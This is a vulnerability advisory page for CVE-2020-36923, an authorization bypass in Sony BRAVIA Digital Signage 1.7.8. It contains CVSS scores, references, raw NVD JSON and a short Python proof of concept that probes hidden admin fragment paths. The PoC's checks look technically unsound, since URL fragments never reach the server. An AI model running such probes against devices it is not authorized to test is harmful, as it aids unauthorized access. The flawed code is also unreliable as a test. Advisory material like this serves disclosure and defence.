Security Vulnerability Report
中文
CVE-2020-36923 CVSS 9.8 CRITICAL

CVE-2020-36923

Published: 2026-01-06 16:15:49
Last Modified: 2026-01-22 21:15:17

Description

Sony BRAVIA Digital Signage 1.7.8 contains an insecure direct object reference vulnerability that allows attackers to bypass authorization controls. Attackers can access hidden system resources like '/#/content-creation' by manipulating client-side access restrictions.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sony:bravia_signage:*:*:*:*:*:*:*:* - VULNERABLE
Sony BRAVIA Digital Signage 1.7.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2020-36923 PoC - Sony BRAVIA Digital Signage Authorization Bypass # Target: Sony BRAVIA Digital Signage 1.7.8 # Vulnerability: Insecure Direct Object Reference (IDOR) - Bypassing client-side access controls def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2020-36923 """ # Hidden admin endpoint that requires authorization bypass hidden_endpoints = [ "/#/content-creation", "/#/admin/settings", "/#/content-management", "/#/system-configuration" ] results = [] for endpoint in hidden_endpoints: # Attempt to access hidden resources directly url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, allow_redirects=False) # Check if access is granted without proper authorization if response.status_code in [200, 302]: results.append({ "endpoint": endpoint, "status": "VULNERABLE", "status_code": response.status_code, "note": "Access granted without authorization" }) else: results.append({ "endpoint": endpoint, "status": "CHECK_MANUALLY", "status_code": response.status_code }) except requests.RequestException as e: results.append({ "endpoint": endpoint, "status": "ERROR", "error": str(e) }) return results if __name__ == "__main__": # Replace with target URL target = "http://target-bravia-signage.local" print(f"[*] Testing CVE-2020-36923 on {target}") print(f"[*] Sony BRAVIA Digital Signage IDOR Vulnerability\n") results = check_vulnerability(target) for result in results: print(f"Endpoint: {result['endpoint']}") print(f"Status: {result['status']}") print(f"---") # Note: This PoC demonstrates the IDOR vulnerability where attackers can # directly access hidden admin resources by manipulating URL paths, # bypassing client-side authorization controls implemented in the web interface.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36923", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:48.780", "lastModified": "2026-01-22T21:15:17.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sony BRAVIA Digital Signage 1.7.8 contains an insecure direct object reference vulnerability that allows attackers to bypass authorization controls. Attackers can access hidden system resources like '/#/content-creation' by manipulating client-side access restrictions."}, {"lang": "es", "value": "Sony BRAVIA Digital Signage 1.7.8 contiene una vulnerabilidad de referencia directa a objeto insegura que permite a los atacantes eludir los controles de autorización. Los atacantes pueden acceder a recursos ocultos del sistema como '/#/content-creation' manipulando las restricciones de acceso del lado del cliente."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sony:bravia_signage:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.8", "matchCriteriaId": "52C80402-E933-4ADC-BB1A-B82CD69D64BF"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2020120031", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192607", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/160344", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://pro-bravia.sony.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pro-bravia.sony.net/resources/software/bravia-signage/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pro.sony/ue_US/products/display-software", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/sony-bravia-digital-signage-client-side-protection-bypass-via-idor", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5611.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/codes/sonybravia_idor.txt", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5611.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}